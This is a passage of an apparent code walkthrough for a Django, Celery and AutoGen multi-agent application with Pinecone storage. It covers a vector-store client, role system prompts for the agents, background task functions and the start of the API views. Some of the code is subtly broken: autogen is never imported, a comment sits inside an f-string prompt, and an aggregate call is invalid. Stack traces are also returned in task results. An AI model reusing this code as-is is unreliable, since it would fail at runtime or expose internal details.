41
42 except Exception as e:
43 logger.error(f"Error initializing Pinecone: {str(e)}")
44 raise
45
46 def get_embedding(self, text):
47 """Get embedding for text using OpenAI API."""
48 try:
49 response = openai.Embedding.create(
50 input=text,
51 model="text-embedding-ada-002"
52 )
53 return response["data"][0]["embedding"]
54 except Exception as e:
55 logger.error(f"Error generating embedding: {str(e)}")
56 raise
57
58 def add_item(self, item_id, text, metadata=None):
59 """Add an item to the vector database."""
60 try:
61 # Get text embedding
62 embedding = self.get_embedding(text)
63
64 # Prepare metadata
65 if metadata is None:
66 metadata = {}
67
68 # Add text to metadata for retrieval
69 metadata["text"] = text
70
71 # Upsert vector to Pinecone
72 self.index.upsert(
73 vectors=[(item_id, embedding, metadata)]
74 )
75
76 logger.info(f"Added item {item_id} to Pinecone")
77 return item_id
78
79 except Exception as e:
80 logger.error(f"Error adding item to Pinecone: {str(e)}")
81 raise
82
83 def delete_item(self, item_id):
84 """Delete an item from the vector database."""
85 try:
86 self.index.delete(ids=[item_id])
87 logger.info(f"Deleted item {item_id} from Pinecone")
88 return True
89 except Exception as e:
90 logger.error(f"Error deleting item from Pinecone: {str(e)}")
91 raise
92
93 def search(self, query, filters=None, top_k=5):
94 """Search for similar items in the vector database."""
95 try:
96 # Get query embedding
97 query_embedding = self.get_embedding(query)
98
99 # Perform vector similarity search
100 results = self.index.query(
101 vector=query_embedding,
102 top_k=top_k,
103 include_metadata=True,
104 filter=filters
105 )
106
107 # Format results
108 formatted_results = []
109 for match in results.matches:
110 formatted_results.append({
111 "id": match.id,
112 "score": match.score,
113 "text": match.metadata.get("text", ""),
114 "metadata": {k: v for k, v in match.metadata.items() if k != "text"}
115 })
116
117 return formatted_results
118
119 except Exception as e:
120 logger.error(f"Error searching Pinecone: {str(e)}")
121 raise
122
123 def update_metadata(self, item_id, metadata):
124 """Update metadata for an existing item."""
125 try:
126 # Get current vector and metadata
127 vector_data = self.index.fetch([item_id])
128
129 if item_id not in vector_data.vectors:
130 logger.error(f"Item {item_id} not found in Pinecone")
131 return False
132
133 # Extract the vector and current metadata
134 current_vector = vector_data.vectors[item_id].values
135 current_metadata = vector_data.vectors[item_id].metadata
136
137 # Update metadata
138 updated_metadata = {**current_metadata, **metadata}
139
140 # Upsert with updated metadata
141 self.index.upsert(
142 vectors=[(item_id, current_vector, updated_metadata)]
143 )
144
145 logger.info(f"Updated metadata for item {item_id}")
146 return True
147
148 except Exception as e:
149 logger.error(f"Error updating metadata in Pinecone: {str(e)}")
150 raise
151
152 def get_stats(self):
153 """Get statistics about the index."""
154 try:
155 stats = self.index.describe_index_stats()
156 return {
157 "namespaces": stats.get("namespaces", {}),
158 "dimension": stats.get("dimension"),
159 "total_vector_count": stats.get("total_vector_count")
160 }
161 except Exception as e:
162 logger.error(f"Error getting Pinecone stats: {str(e)}")
163 raise
python
1# agent_app/utils/prompt_templates.py
2"""
3Prompt templates for various agent types.
4"""
5
6def get_system_prompt(agent_type):
7 """
8 Get the system prompt for a specific agent type.
9
10 Args:
11 agent_type (str): The type of agent
12
13 Returns:
14 str: The system prompt
15 """
16 prompts = {
17 "researcher": """You are an expert research agent who specializes in gathering comprehensive information on any topic. Your strength is in finding relevant information, evaluating sources, and synthesizing findings.
18
19Your capabilities:
201. Conduct thorough research on any given topic
212. Evaluate the credibility and relevance of sources
223. Identify key information and insights
234. Synthesize findings into clear, structured formats
245. Properly cite and attribute information to sources
256. Identify gaps in available information
26
27When researching:
28- Always begin by assessing what specific information is needed
29- Consider multiple perspectives and sources
30- Remain objective and unbiased
31- Distinguish between facts, expert opinions, and uncertain claims
32- Structure your findings in a logical manner
33- Note limitations in available information
34
35Your goal is to provide the most accurate, comprehensive, and well-organized research possible.""",
36
37 "analyst": """You are an expert data analyst agent who excels at interpreting and deriving insights from complex data. Your strength is in statistical analysis, pattern recognition, and communicating findings clearly.
38
39Your capabilities:
401. Analyze numerical and categorical data
412. Identify trends, patterns, and anomalies
423. Apply appropriate statistical methods to datasets
434. Generate actionable insights from analysis
445. Create clear interpretations of analytical results
456. Make data-driven recommendations
46
47When analyzing:
48- First understand the context and objectives of the analysis
49- Consider what methods are most appropriate for the data type
50- Identify key metrics and indicators that address the objectives
51- Look for correlations, trends, and outliers
52- Consider statistical significance and confidence levels
53- Communicate findings in clear, non-technical terms when needed
54- Always disclose limitations and uncertainty in your analysis
55
56Your goal is to transform raw data into valuable insights and recommendations.""",
57
58 "document_processor": """You are an expert document processing agent who specializes in analyzing, summarizing, and extracting information from documents. Your strength is in understanding document structure, identifying key information, and producing accurate analyses.
59
60Your capabilities:
611. Extract key information from documents
622. Summarize document content at different levels of detail
633. Identify main themes, arguments, and conclusions
644. Recognize document structure and organization
655. Classify documents by type, purpose, and content
666. Extract named entities and relationships
67
68When processing documents:
69- First identify the document type and purpose
70- Consider the document's structure and organization
71- Identify the most important sections and content
72- Extract key information, claims, and evidence
73- Recognize the tone, style, and intended audience
74- Maintain the original meaning and context
75- Be precise in your extraction and summarization
76
77Your goal is to accurately process documents and make their information accessible and useful.""",
78
79 "conversation": """You are an expert conversation agent who excels at engaging in natural, helpful dialogue. Your strength is in understanding user needs, providing relevant information, and maintaining engaging interactions.
80
81Your capabilities:
821. Engage in natural, flowing conversation
832. Understand explicit and implicit user questions
843. Provide clear, concise, and accurate information
854. Adapt your tone and style to match the user
865. Ask clarifying questions when needed
876. Remember context throughout a conversation
88
89During conversations:
90- Listen carefully to understand the user's full intent
91- Provide helpful, relevant responses
92- Be concise but complete in your answers
93- Maintain a consistent tone and personality
94- Ask questions when needed for clarification
95- Acknowledge when you don't know something
96- Structure complex information clearly
97
98Your goal is to provide an engaging, helpful, and informative conversation experience.""",
99
100 "generic": """You are a versatile assistant agent capable of handling a wide range of tasks. You can provide information, answer questions, offer suggestions, and assist with various needs.
101
102Your capabilities:
1031. Answer questions across diverse domains
1042. Provide explanations and clarifications
1053. Offer suggestions and recommendations
1064. Help with planning and organization
1075. Assist with creative tasks
1086. Engage in thoughtful discussion
109
110When assisting:
111- Understand the core request or question
112- Provide clear, accurate, and helpful responses
113- Consider the context and intent behind questions
114- Structure your responses logically
115- Be honest about your limitations
116- Maintain a helpful and supportive tone
117
118Your goal is to be a versatile, reliable, and helpful assistant.""",
119
120 "writer": """You are an expert writing agent who specializes in creating clear, engaging, and well-structured content. Your strength is in adapting your writing style to different purposes and audiences.
121
122Your capabilities:
1231. Create clear and engaging content in various formats
1242. Adapt writing style to different audiences and purposes
1253. Structure content logically and coherently
1264. Edit and refine existing content
1275. Ensure grammar, spelling, and stylistic consistency
1286. Generate creative and original content
129
130When writing:
131- Consider the purpose, audience, and context
132- Organize information with a clear structure
133- Use appropriate tone, style, and vocabulary
134- Create engaging introductions and conclusions
135- Use transitions to guide readers through the content
136- Revise for clarity, conciseness, and impact
137
138Your goal is to produce high-quality written content that effectively communicates ideas to the intended audience.""",
139
140 "data_processor": """You are an expert data processing agent who specializes in preparing, cleaning, and transforming data for analysis. Your strength is in handling raw data and making it ready for meaningful analysis.
141
142Your capabilities:
1431. Clean and normalize messy datasets
1442. Handle missing, duplicate, or inconsistent data
1453. Transform data into appropriate formats
1464. Merge and join datasets from multiple sources
1475. Create derived features and variables
1486. Identify and address data quality issues
149
150When processing data:
151- First assess the data structure and quality
152- Identify issues that need to be addressed
153- Apply appropriate cleaning and transformation methods
154- Document all changes made to the original data
155- Validate the processed data for accuracy
156- Prepare the data in a format suitable for analysis
157
158Your goal is to transform raw data into a clean, consistent, and analysis-ready format.""",
159
160 "visualization": """You are an expert data visualization agent who specializes in creating effective visual representations of data. Your strength is in selecting and designing visualizations that clearly communicate insights.
161
162Your capabilities:
1631. Select appropriate visualization types for different data
1642. Design clear, informative visual representations
1653. Highlight key patterns, trends, and relationships in data
1664. Create accessible and intuitive visualizations
1675. Adapt visualizations for different audiences
1686. Combine multiple visualizations into dashboards
169
170When creating visualizations:
171- Consider the data type and relationships to visualize
172- Select the most appropriate chart or graph type
173- Focus on clearly communicating the main insights
174- Minimize clutter and maximize data-ink ratio
175- Use color, labels, and annotations effectively
176- Consider accessibility and interpretability
177- Provide clear titles, legends, and context
178
179Your goal is to create visualizations that effectively communicate data insights in an accessible and impactful way.""",
180
181 "report_writer": """You are an expert report writing agent who specializes in creating comprehensive, structured reports that effectively communicate findings and insights. Your strength is in organizing information logically and presenting it clearly.
182
183Your capabilities:
1841. Create well-structured reports for different purposes
1852. Organize findings and insights logically
1863. Present complex information clearly and concisely
1874. Integrate data, analysis, and visualizations
1885. Adapt content and style to different audiences
1896. Highlight key findings and recommendations
190
191When writing reports:
192- Consider the purpose, audience, and required detail level
193- Create a logical structure with clear sections
194- Begin with an executive summary of key points
195- Present findings with supporting evidence
196- Use visuals to complement and enhance text
197- Maintain consistent formatting and style
198- Conclude with clear insights and recommendations
199
200Your goal is to produce comprehensive, clear reports that effectively communicate information to the intended audience.""",
201
202 "planner": """You are an expert planning agent who specializes in breaking down complex tasks into organized, achievable steps. Your strength is in creating structured plans that lead to successful outcomes.
203
204Your capabilities:
2051. Break down complex tasks into manageable steps
2062. Identify dependencies between tasks
2073. Estimate time and resources needed
2084. Prioritize tasks based on importance and urgency
2095. Identify potential risks and mitigation strategies
2106. Adapt plans as circumstances change
211
212When planning:
213- First understand the overall goal and constraints
214- Identify all necessary tasks and subtasks
215- Determine logical sequence and dependencies
216- Allocate appropriate time and resources
217- Highlight critical path items and bottlenecks
218- Include checkpoints to assess progress
219- Anticipate potential obstacles and plan alternatives
220
221Your goal is to create clear, achievable plans that efficiently lead to successful outcomes.""",
222
223 "executor": """You are an expert execution agent who specializes in implementing plans and completing tasks. Your strength is in taking action, solving problems, and delivering results.
224
225Your capabilities:
2261. Implement plans and complete assigned tasks
2272. Follow procedures and instructions precisely
2283. Solve problems that arise during execution
2294. Adapt to changing circumstances
2305. Manage resources efficiently
2316. Document actions and results
232
233When executing:
234- Review and understand the task requirements
235- Gather necessary resources and information
236- Follow established procedures and best practices
237- Address issues promptly as they arise
238- Document progress and completed work
239- Communicate status and any obstacles clearly
240- Verify that outcomes meet requirements
241
242Your goal is to effectively implement plans and deliver high-quality results.""",
243
244 "reviewer": """You are an expert review agent who specializes in evaluating work and providing constructive feedback. Your strength is in assessing quality, identifying issues, and suggesting improvements.
245
246Your capabilities:
2471. Evaluate work against established criteria and standards
2482. Identify strengths and weaknesses
2493. Detect errors, inconsistencies, and problems
2504. Ensure compliance with requirements
2515. Provide specific, actionable feedback
2526. Suggest concrete improvements
253
254When reviewing:
255- First understand the requirements and context
256- Evaluate objectively against clear criteria
257- Be thorough and systematic in your assessment
258- Provide balanced feedback on strengths and weaknesses
259- Be specific about issues and why they matter
260- Suggest clear, actionable improvements
261- Maintain a constructive and helpful tone
262
263Your goal is to improve quality through thorough evaluation and constructive feedback.""",
264 }
265
266 return prompts.get(agent_type, prompts["generic"])

Now let's implement the Celery tasks:

python
1# agent_app/tasks.py
2import time
3import json
4import logging
5import traceback
6from django.utils import timezone
7from django.conf import settings
8from celery import shared_task
9from celery.exceptions import SoftTimeLimitExceeded
10from .models import AgentTask, KnowledgeItem, Conversation, Message
11from .utils.agent_factory import AgentFactory
12from .utils.pinecone_client import PineconeClient
13
14logger = logging.getLogger('agent_app')
15
16@shared_task(bind=True,
17 soft_time_limit=1800, # 30 minute soft limit
18 time_limit=1900, # ~32 minute hard limit
19 acks_late=True, # Acknowledge task after execution
20 retry_backoff=True, # Exponential backoff for retries
21 max_retries=3) # Maximum retry attempts
22def process_agent_task(self, task_id):
23 """
24 Process an agent task with the appropriate agent type.
25
26 Args:
27 task_id (str): UUID of the task to process
28
29 Returns:
30 dict: Result data
31 """
32 try:
33 # Get task from database
34 try:
35 task = AgentTask.objects.get(id=task_id)
36 except AgentTask.DoesNotExist:
37 logger.error(f"Task {task_id} not found")
38 return {"error": f"Task {task_id} not found"}
39
40 # Update task status
41 task.set_processing(self.request.id)
42 logger.info(f"Processing task {task_id} of type {task.task_type}")
43
44 # Initialize agent factory
45 agent_factory = AgentFactory(user_id=task.user.id)
46
47 # Process based on task type
48 if task.task_type in ['research', 'analysis']:
49 # Create a team of agents for complex tasks
50 team = agent_factory.create_agent_team(task.input_data)
51 result = process_team_task(team, task.input_data)
52 else:
53 # Create an individual agent
54 agent_type = task.input_data.get('agent_type', 'generic')
55 context = task.input_data.get('context', {})
56 agent = agent_factory.create_agent(agent_type, context)
57
58 # Process the task
59 result = process_individual_task(agent, task.input_data)
60
61 # Extract token usage
62 token_usage = result.get('token_usage', {})
63
64 # Update task as completed
65 task.set_completed(result, token_usage)
66 logger.info(f"Task {task_id} completed successfully")
67
68 return result
69
70 except SoftTimeLimitExceeded:
71 # Handle timeout
72 logger.error(f"Task {task_id} exceeded time limit")
73 try:
74 task = AgentTask.objects.get(id=task_id)
75 task.set_failed("Task exceeded time limit")
76 except Exception as e:
77 logger.error(f"Error updating task: {str(e)}")
78
79 return {"error": "Task exceeded time limit"}
80
81 except Exception as e:
82 # Handle other exceptions
83 error_msg = str(e)
84 stack_trace = traceback.format_exc()
85 logger.error(f"Error processing task {task_id}: {error_msg}\n{stack_trace}")
86
87 try:
88 task = AgentTask.objects.get(id=task_id)
89 task.set_failed(f"{error_msg}\n{stack_trace}")
90 except Exception as e2:
91 logger.error(f"Error updating task status: {str(e2)}")
92
93 # Retry for certain exceptions
94 if "Rate limit" in error_msg or "timeout" in error_msg.lower():
95 raise self.retry(exc=e, countdown=60)
96
97 return {"error": error_msg, "stack_trace": stack_trace}
98
99def process_team_task(team, task_data):
100 """
101 Process a task using a team of agents.
102
103 Args:
104 team (dict): The team configuration with agents
105 task_data (dict): Task data
106
107 Returns:
108 dict: Result data
109 """
110 start_time = time.time()
111
112 # Extract team components
113 user_proxy = team["user_proxy"]
114 manager = team["manager"]
115
116 # Prepare the task message
117 task_description = task_data.get('description', '')
118 task_details = task_data.get('details', {})
119
120 message = f"Task: {task_description}\n\n"
121
122 if task_details:
123 message += "Details:\n"
124 for key, value in task_details.items():
125 message += f"- {key}: {value}\n"
126
127 # Start the group conversation
128 user_proxy.initiate_chat(
129 manager,
130 message=message
131 )
132
133 # Extract results
134 chat_history = user_proxy.chat_history
135 result_content = None
136
137 # Find the final result from the chat history
138 for msg in reversed(chat_history):
139 if msg.get("role") == "assistant" and len(msg.get("content", "")) > 100:
140 result_content = msg.get("content")
141 break
142
143 # If no clear result is found, summarize the entire conversation
144 if not result_content:
145 result_content = "No clear result was produced. Here's the conversation summary:\n\n"
146 for msg in chat_history:
147 if msg.get("role") in ["assistant", "user"]:
148 result_content += f"{msg.get('role').upper()}: {msg.get('content', '')[:200]}...\n\n"
149
150 # Calculate token usage (estimated)
151 total_input_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
152 total_output_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")
153
154 duration = time.time() - start_time
155
156 return {
157 "result": result_content,
158 "chat_history": chat_history,
159 "duration_seconds": duration,
160 "team_composition": [agent.name for agent in team["agents"]],
161 "token_usage": {
162 "prompt_tokens": int(total_input_tokens),
163 "completion_tokens": int(total_output_tokens),
164 "total_tokens": int(total_input_tokens + total_output_tokens)
165 }
166 }
167
168def process_individual_task(agent, task_data):
169 """
170 Process a task using an individual agent.
171
172 Args:
173 agent (AssistantAgent): The agent to process the task
174 task_data (dict): Task data
175
176 Returns:
177 dict: Result data
178 """
179 start_time = time.time()
180
181 # Create user proxy agent
182 user_proxy = autogen.UserProxyAgent(
183 name="TaskUser",
184 human_input_mode="NEVER",
185 max_consecutive_auto_reply=0
186 )
187
188 # Prepare the task message
189 query = task_data.get('query', '')
190 context = task_data.get('context', {})
191
192 message = query
193
194 if context:
195 message += "\n\nContext:\n"
196 for key, value in context.items():
197 message += f"- {key}: {value}\n"
198
199 # Start conversation with agent
200 user_proxy.initiate_chat(
201 agent,
202 message=message
203 )
204
205 # Get the last message from the agent as the result
206 chat_history = user_proxy.chat_history
207 result_content = None
208
209 for msg in reversed(chat_history):
210 if msg.get("role") == "assistant":
211 result_content = msg.get("content")
212 break
213
214 # Calculate token usage (estimated)
215 total_input_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
216 total_output_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")
217
218 duration = time.time() - start_time
219
220 return {
221 "result": result_content,
222 "chat_history": chat_history,
223 "duration_seconds": duration,
224 "agent_type": agent.name,
225 "token_usage": {
226 "prompt_tokens": int(total_input_tokens),
227 "completion_tokens": int(total_output_tokens),
228 "total_tokens": int(total_input_tokens + total_output_tokens)
229 }
230 }
231
232@shared_task(bind=True,
233 soft_time_limit=300, # 5 minute soft limit
234 acks_late=True,
235 max_retries=2)
236def update_knowledge_base(self, knowledge_item_id):
237 """
238 Update a knowledge item in the vector database.
239
240 Args:
241 knowledge_item_id (str): UUID of the knowledge item to update
242
243 Returns:
244 dict: Result status
245 """
246 try:
247 # Get knowledge item from database
248 try:
249 item = KnowledgeItem.objects.get(id=knowledge_item_id)
250 except KnowledgeItem.DoesNotExist:
251 logger.error(f"Knowledge item {knowledge_item_id} not found")
252 return {"error": f"Knowledge item {knowledge_item_id} not found"}
253
254 logger.info(f"Updating knowledge item {knowledge_item_id} in vector database")
255
256 # Initialize Pinecone client
257 pinecone_client = PineconeClient()
258
259 # Prepare metadata
260 metadata = {
261 "user_id": str(item.user.id),
262 "title": item.title,
263 "source": item.source,
264 "domain": item.domain,
265 "tags": json.dumps(item.tags),
266 "confidence": item.confidence,
267 "created_at": item.created_at.isoformat()
268 }
269
270 # Update or create vector
271 if item.vector_id:
272 # Update existing vector
273 success = pinecone_client.update_metadata(item.vector_id, metadata)
274 if not success:
275 # If update failed, create new vector
276 vector_id = pinecone_client.add_item(
277 str(item.id),
278 item.content,
279 metadata
280 )
281 item.vector_id = vector_id
282 item.save(update_fields=['vector_id', 'last_updated'])
283 else:
284 # Create new vector
285 vector_id = pinecone_client.add_item(
286 str(item.id),
287 item.content,
288 metadata
289 )
290 item.vector_id = vector_id
291 item.save(update_fields=['vector_id', 'last_updated'])
292
293 logger.info(f"Knowledge item {knowledge_item_id} updated successfully")
294
295 return {
296 "status": "success",
297 "message": f"Knowledge item {knowledge_item_id} updated",
298 "vector_id": item.vector_id
299 }
300
301 except Exception as e:
302 error_msg = str(e)
303 stack_trace = traceback.format_exc()
304 logger.error(f"Error updating knowledge item {knowledge_item_id}: {error_msg}\n{stack_trace}")
305
306 # Retry for certain exceptions
307 if "Rate limit" in error_msg or "timeout" in error_msg.lower():
308 raise self.retry(exc=e, countdown=30)
309
310 return {"error": error_msg, "stack_trace": stack_trace}
311
312@shared_task(bind=True,
313 soft_time_limit=600, # 10 minute soft limit
314 acks_late=True,
315 max_retries=2)
316def analyze_document(self, task_id):
317 """
318 Analyze a document using a document processor agent.
319
320 Args:
321 task_id (str): UUID of the task to process
322
323 Returns:
324 dict: Analysis results
325 """
326 try:
327 # Get task from database
328 try:
329 task = AgentTask.objects.get(id=task_id)
330 except AgentTask.DoesNotExist:
331 logger.error(f"Task {task_id} not found")
332 return {"error": f"Task {task_id} not found"}
333
334 # Update task status
335 task.set_processing(self.request.id)
336 logger.info(f"Analyzing document for task {task_id}")
337
338 # Initialize agent factory
339 agent_factory = AgentFactory(user_id=task.user.id)
340
341 # Create document processor agent
342 context = {
343 "document_type": task.input_data.get("document_type", "general")
344 }
345 agent = agent_factory.create_agent("document_processor", context)
346
347 # Extract document text
348 document_text = task.input_data.get("document", "")
349 if not document_text:
350 raise ValueError("No document text provided")
351
352 # Create user proxy agent
353 user_proxy = autogen.UserProxyAgent(
354 name="DocumentUser",
355 human_input_mode="NEVER",
356 max_consecutive_auto_reply=0
357 )
358
359 # Prepare analysis instructions
360 analysis_type = task.input_data.get("analysis_type", "general")
361
362 instructions = f"""Analyze the following document.
363
364Document type: {context.get('document_type', 'general')}
365Analysis type: {analysis_type}
366
367Please provide:
3681. A concise summary of the document
3692. Key entities and topics mentioned
3703. Main points or arguments presented
3714. Any notable insights or implications
372
373Document text:
374{document_text[:8000]} # Limit to first 8000 chars to avoid token limits
375"""
376
377 if len(document_text) > 8000:
378 instructions += "\n\n[Note: Document has been truncated due to length. Analysis based on first portion only.]"
379
380 # Start conversation with agent
381 user_proxy.initiate_chat(
382 agent,
383 message=instructions
384 )
385
386 # Get the analysis result
387 chat_history = user_proxy.chat_history
388 analysis_result = None
389
390 for msg in reversed(chat_history):
391 if msg.get("role") == "assistant":
392 analysis_result = msg.get("content")
393 break
394
395 # Calculate token usage (estimated)
396 total_input_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
397 total_output_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")
398
399 # Prepare result data
400 result = {
401 "analysis": analysis_result,
402 "document_type": context.get("document_type"),
403 "analysis_type": analysis_type,
404 "character_count": len(document_text),
405 "token_usage": {
406 "prompt_tokens": int(total_input_tokens),
407 "completion_tokens": int(total_output_tokens),
408 "total_tokens": int(total_input_tokens + total_output_tokens)
409 }
410 }
411
412 # Update task as completed
413 task.set_completed(result, result["token_usage"])
414 logger.info(f"Document analysis for task {task_id} completed")
415
416 return result
417
418 except Exception as e:
419 error_msg = str(e)
420 stack_trace = traceback.format_exc()
421 logger.error(f"Error analyzing document for task {task_id}: {error_msg}\n{stack_trace}")
422
423 try:
424 task = AgentTask.objects.get(id=task_id)
425 task.set_failed(f"{error_msg}\n{stack_trace}")
426 except Exception as e2:
427 logger.error(f"Error updating task status: {str(e2)}")
428
429 return {"error": error_msg, "stack_trace": stack_trace}
430
431@shared_task(bind=True)
432def periodic_agent_check(self):
433 """
434 Periodic task to check for stalled agent tasks.
435 """
436 try:
437 # Find tasks that have been processing for too long (1 hour)
438 one_hour_ago = timezone.now() - timezone.timedelta(hours=1)
439 stalled_tasks = AgentTask.objects.filter(
440 status='processing',
441 started_at__lt=one_hour_ago
442 )
443
444 count = stalled_tasks.count()
445 logger.info(f"Found {count} stalled tasks")
446
447 # Mark tasks as failed
448 for task in stalled_tasks:
449 task.set_failed("Task stalled - processing timeout exceeded")
450 logger.warning(f"Marked task {task.id} as failed due to processing timeout")
451
452 return {"status": "success", "stalled_tasks_count": count}
453
454 except Exception as e:
455 logger.error(f"Error in periodic agent check: {str(e)}")
456 return {"status": "error", "message": str(e)}
457
458@shared_task(bind=True)
459def process_conversation(self, conversation_id, message_id):
460 """
461 Process a new message in a conversation.
462
463 Args:
464 conversation_id (str): UUID of the conversation
465 message_id (str): UUID of the message to process
466
467 Returns:
468 dict: Response data
469 """
470 try:
471 # Get conversation and message from database
472 try:
473 conversation = Conversation.objects.get(id=conversation_id)
474 message = Message.objects.get(id=message_id, conversation=conversation)
475 except (Conversation.DoesNotExist, Message.DoesNotExist):
476 logger.error(f"Conversation {conversation_id} or message {message_id} not found")
477 return {"error": "Conversation or message not found"}
478
479 logger.info(f"Processing message {message_id} in conversation {conversation_id}")
480
481 # Initialize agent factory
482 agent_factory = AgentFactory(user_id=conversation.user.id)
483
484 # Create conversation agent
485 context = {
486 "topic": conversation.topic,
487 "tone": "conversational"
488 }
489 agent = agent_factory.create_agent("conversation", context)
490
491 # Get conversation history (last 10 messages)
492 history = conversation.messages.order_by('created_at')[:10]
493
494 # Prepare conversation context
495 conversation_context = ""
496 for hist_msg in history:
497 if hist_msg.id != message.id: # Skip the current message
498 conversation_context += f"{hist_msg.role.upper()}: {hist_msg.content}\n\n"
499
500 # Create user proxy agent
501 user_proxy = autogen.UserProxyAgent(
502 name="ConversationUser",
503 human_input_mode="NEVER",
504 max_consecutive_auto_reply=0
505 )
506
507 # Prepare the message with context
508 prompt = f"""This is part of an ongoing conversation. Please respond to the latest message.
509
510Previous conversation:
511{conversation_context}
512
513Current message:
514USER: {message.content}
515
516Please respond in a helpful, conversational manner."""
517
518 # Start conversation with agent
519 user_proxy.initiate_chat(
520 agent,
521 message=prompt
522 )
523
524 # Get the response from the agent
525 chat_history = user_proxy.chat_history
526 response_content = None
527
528 for msg in reversed(chat_history):
529 if msg.get("role") == "assistant":
530 response_content = msg.get("content")
531 break
532
533 if response_content:
534 # Create response message
535 response = Message.objects.create(
536 conversation=conversation,
537 role="assistant",
538 content=response_content,
539 agent_name=agent.name,
540 token_count=len(response_content.split()) * 1.3 # Approximate token count
541 )
542
543 # Update conversation
544 conversation.updated_at = timezone.now()
545 conversation.save(update_fields=['updated_at'])
546
547 logger.info(f"Created response message {response.id} in conversation {conversation_id}")
548
549 # Calculate token usage (estimated)
550 total_input_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
551 total_output_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")
552
553 return {
554 "status": "success",
555 "response_id": str(response.id),
556 "response_content": response_content,
557 "token_usage": {
558 "prompt_tokens": int(total_input_tokens),
559 "completion_tokens": int(total_output_tokens),
560 "total_tokens": int(total_input_tokens + total_output_tokens)
561 }
562 }
563 else:
564 logger.error(f"No response generated for message {message_id}")
565 return {"error": "No response generated"}
566
567 except Exception as e:
568 error_msg = str(e)
569 stack_trace = traceback.format_exc()
570 logger.error(f"Error processing conversation message: {error_msg}\n{stack_trace}")
571
572 return {"error": error_msg, "stack_trace": stack_trace}

Now, let's implement the API views:

python
1# agent_app/views.py
2import uuid
3import logging
4from django.shortcuts import get_object_or_404
5from django.utils import timezone
6from django.db.models import Count, Sum, Max, F, ExpressionWrapper, fields
7from django.db.models.functions import TruncDay
8from rest_framework import viewsets, status, permissions
9from rest_framework.decorators import action
10from rest_framework.response import Response
11from rest_framework.views import APIView
12from .models import AgentTask, KnowledgeItem, Conversation, Message
13from .serializers import (
14 AgentTaskSerializer, KnowledgeItemSerializer,
15 ConversationSerializer, MessageSerializer,
16 ConversationMessageSerializer
17)
18from .tasks import (
19 process_agent_task, update_knowledge_base,
20 analyze_document, process_conversation
21)
22from .utils.pinecone_client import PineconeClient
23
24logger = logging.getLogger('agent_app')
25
26class AgentTaskViewSet(viewsets.ModelViewSet):
27 """ViewSet for managing agent tasks."""
28 serializer_class = AgentTaskSerializer
29 permission_classes = [permissions.IsAuthenticated]
30
31 def get_queryset(self):
32 """Return tasks for the current user."""
33 return AgentTask.objects.filter(user=self.request.user).order_by('-created_at')
34
35 def create(self, request, *args, **kwargs):
36 """Create a new task and queue it for processing."""
37 serializer = self.get_serializer(data=request.data)
38 serializer.is_valid(raise_exception=True)
39 task = serializer.save()
40
41 # Queue the task for processing based on type
42 if task.task_type == 'document':
43 # Use document-specific task
44 result = analyze_document.delay(str(task.id))
45 else:
46 # Use general task processing
47 result = process_agent_task.delay(str(task.id))
48
49 # Update task with celery task ID
50 task.celery_task_id = result.id
51 task.save(update_fields=['celery_task_id'])
52
53 headers = self.get_success_headers(serializer.data)
54 return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
55
56 @action(detail=True, methods=['post'])
57 def cancel(self, request, pk=None):
58 """Cancel a running task."""
59 task = self.get_object()
60
61 if task.status not in ['pending', 'processing']:
62 return Response(
63 {"detail": "Only pending or processing tasks can be canceled."},
64 status=status.HTTP_400_BAD_REQUEST
65 )
66
67 # Update task status
68 task.status = 'canceled'
69 task.completed_at = timezone.now()
70 task.save(update_fields=['status', 'completed_at', 'updated_at'])
71
72 # Could also revoke the Celery task here
73
74 return Response({"detail": "Task canceled successfully."})
75
76 @action(detail=False, methods=['get'])
77 def stats(self, request):
78 """Get statistics about tasks."""
79 queryset = self.get_queryset()
80
81 # Basic counts
82 total_tasks = queryset.count()
83 completed_tasks = queryset.filter(status='completed').count()
84 failed_tasks = queryset.filter(status='failed').count()
85
86 # Token usage statistics
87 token_stats = queryset.filter(status='completed').aggregate(
88 total_prompt_tokens=Sum('prompt_tokens'),
89 total_completion_tokens=Sum('completion_tokens'),
90 total_tokens=Sum('total_tokens'),
91 avg_tokens_per_task=ExpressionWrapper(
92 Sum('total_tokens') * 1.0 / Count('id'),
93 output_field=fields.FloatField()
94 ),
95 total_cost=Sum('estimated_cost')
96 )
97
98 # Task type distribution
99 type_distribution = (
100 queryset
101 .values('task_type')
102 .annotate(count=Count('id'))
103 .order_by('-count')
104 )
105
106 # Task creation over time (last 30 days)
107 thirty_days_ago = timezone.now() - timezone.timedelta(days=30)
108 time_series = (
109 queryset
110 .filter(created_at__gte=thirty_days_ago)
111 .annotate(day=TruncDay('created_at'))
112 .values('day')
113 .annotate(count=Count('id'))
114 .order_by('day')
115 )
116
117 # Average processing time
118 time_stats = queryset.filter(
119 status='completed',
120 started_at__isnull=False,
121 completed_at__isnull=False
122 ).aggregate(
123 avg_processing_time=ExpressionWrapper(
124 (F('completed_at') - F('started_at')) / 1000000, # Convert microseconds to seconds
125 output_field=fields.FloatField()
126 )
127 )
128
129 return Response({
130 "total_tasks": total_tasks,
131 "completed_tasks": completed_tasks,
132 "failed_tasks": failed_tasks,
133 "token_stats": token_stats,
134 "type_distribution": type_distribution,
135 "time_series": time_series,
136 "time_stats": time_stats
137 })
138
139class KnowledgeItemViewSet(viewsets.ModelViewSet):
140 """ViewSet for managing knowledge items."""
141 serializer_class = KnowledgeItemSerializer
142 permission_classes = [permissions.IsAuthenticated]
143
144 def get_queryset(self):
145 """Return knowledge items for the current user."""
146 return KnowledgeItem.objects.filter(user=self.request.user).order_by('-created_at')
147
148 def create(self, request, *args, **kwargs):
149 """Create a new knowledge item and index it."""
150 serializer = self.get_serializer(data=request.data)
151 serializer.is_valid(raise_exception=True)
152 item = serializer.save()
153
154 # Queue indexing task
